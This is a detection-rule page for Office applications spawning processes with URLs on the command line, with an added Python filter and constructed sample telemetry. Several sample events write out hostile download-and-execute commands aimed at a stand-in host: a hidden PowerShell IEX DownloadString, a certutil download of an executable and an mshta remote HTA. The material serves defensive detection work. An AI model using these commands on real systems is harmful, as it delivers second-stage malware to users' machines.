
Summary
This analytic detects Microsoft Office applications, specifically Microsoft Word (winword.exe) and Excel (excel.exe), spawning a child process whose command line contains an HTTP or HTTPS URL. The pattern is characteristic of malicious documents that use living-off-the-land binaries (LOLBins) to download and execute a second-stage payload. The rule operates on process creation events from Endpoint Detection and Response (EDR) telemetry, checking the parent process name, the child process name and the child's command line, and it excludes major browsers as child processes so that a user simply clicking a hyperlink in a document does not raise an alert. A true positive indicates a compromised document and should be triaged promptly, because the download is usually the first step toward further code execution and data exfiltration; the rule itself only detects the behavior and relies on a response action to stop it.
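The following is an added example of the detection logic described above, written as a small Python filter over constructed process-creation events; it is not the page's own search or any vendor's code. The Office parent list, the browser exclusion list and the field names (parent image, child image, command line, host) are assumptions chosen to mirror common Sysmon/EDR conventions, and the sample events are constructed for illustration.

```python
"""Added example: Office parent -> child process with an http(s) URL on its
command line, excluding browsers. Not the original page's search; the field
names, process lists and sample events below are assumptions/constructed."""
import re
from dataclasses import dataclass

# Assumed parent processes of interest (the analytic names Word and Excel).
OFFICE_PARENTS = {"winword.exe", "excel.exe"}

# Assumed browser exclusion list: a user clicking a hyperlink in a document
# legitimately launches one of these with a URL on the command line.
BROWSER_EXCLUSIONS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}

# Case-insensitive match for an http:// or https:// URL anywhere on the command line.
URL_PATTERN = re.compile(r"https?://", re.IGNORECASE)


@dataclass
class ProcessEvent:
    host: str
    parent_image: str   # full path of the parent executable
    image: str          # full path of the new child executable
    command_line: str   # command line of the child


def basename(path: str) -> str:
    """Normalise a Windows or POSIX path to a lower-case file name."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_suspicious(ev: ProcessEvent) -> bool:
    """Apply the analytic's three conditions to one process-creation event."""
    if basename(ev.parent_image) not in OFFICE_PARENTS:
        return False
    if basename(ev.image) in BROWSER_EXCLUSIONS:
        return False
    return bool(URL_PATTERN.search(ev.command_line))


def detect(events):
    """Return the events that would trigger the analytic."""
    return [ev for ev in events if is_suspicious(ev)]


# Constructed sample telemetry (example.invalid is a reserved, non-routable name).
SAMPLE_EVENTS = [
    # Macro launching PowerShell to fetch a script: should alert.
    ProcessEvent("ws01", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -nop -w hidden -c IEX (New-Object Net.WebClient)"
                 ".DownloadString('http://example.invalid/stage2.ps1')"),
    # certutil used as a downloader from Excel: should alert.
    ProcessEvent("ws02", r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
                 r"C:\Windows\System32\certutil.exe",
                 "certutil -urlcache -split -f https://example.invalid/x.exe C:\\Users\\Public\\x.exe"),
    # User clicked a hyperlink in a document: browser is excluded, no alert.
    ProcessEvent("ws03", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
                 "msedge.exe --single-argument https://example.invalid/report"),
    # Print spooler helper spawned by Word, no URL: no alert.
    ProcessEvent("ws04", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\splwow64.exe", "C:\\Windows\\splwow64.exe 12288"),
    # Same PowerShell download but parent is Explorer, not Office: no alert.
    ProcessEvent("ws05", r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -c Invoke-WebRequest https://example.invalid/a.ps1"),
    # mshta with an upper-case scheme from Excel: URL match is case-insensitive, should alert.
    ProcessEvent("ws06", r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
                 r"C:\Windows\System32\mshta.exe", "mshta HTTPS://EXAMPLE.INVALID/a.hta"),
]


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(f"ALERT {hit.host}: {basename(hit.parent_image)} -> "
              f"{basename(hit.image)} :: {hit.command_line}")
```

Two practical caveats are visible in the sample set. The parent and child names are compared on the normalised basename, so mixed-case image paths and non-standard install directories do not cause misses. The URL match is a plain substring test on the command line, so a macro that assembles the URL at runtime, passes it through an encoded PowerShell command, or writes the script to a file first will not be caught by this condition alone; pairing the rule with a broader "Office spawns LOLBin" analytic closes that gap.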
Categories
- Endpoint
Data Sources
- Windows Registry
- Process
- Network Traffic
- Application Log
ATT&CK Techniques
- T1566
- T1566.001
Created: 2025-01-14